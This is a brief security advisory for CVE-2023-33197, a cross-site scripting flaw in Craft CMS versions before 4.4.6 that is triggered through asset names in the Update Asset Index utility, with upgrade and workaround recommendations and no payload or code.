CVE-2023-33197

Name of the Vulnerable Software and Affected Versions Craft versions prior to 4.4.6

Description Cross-site scripting (XSS) can be triggered via the Update Asset Index utility. This issue allows an attacker to inject malicious scripts, potentially leading to unauthorized access or data theft. The vulnerability is exploited by injecting a payload into the asset name, which is then triggered when the Update Asset Indexes utility is used. The JSON response from the volumes name can also trigger the payload on every POST request in the utility.

Recommendations For versions prior to 4.4.6, update to version 4.4.6 or later to resolve the issue. As a temporary workaround, consider restricting access to the Update Asset Index utility until the update can be applied. Avoid using the utility with untrusted input to minimize the risk of exploitation.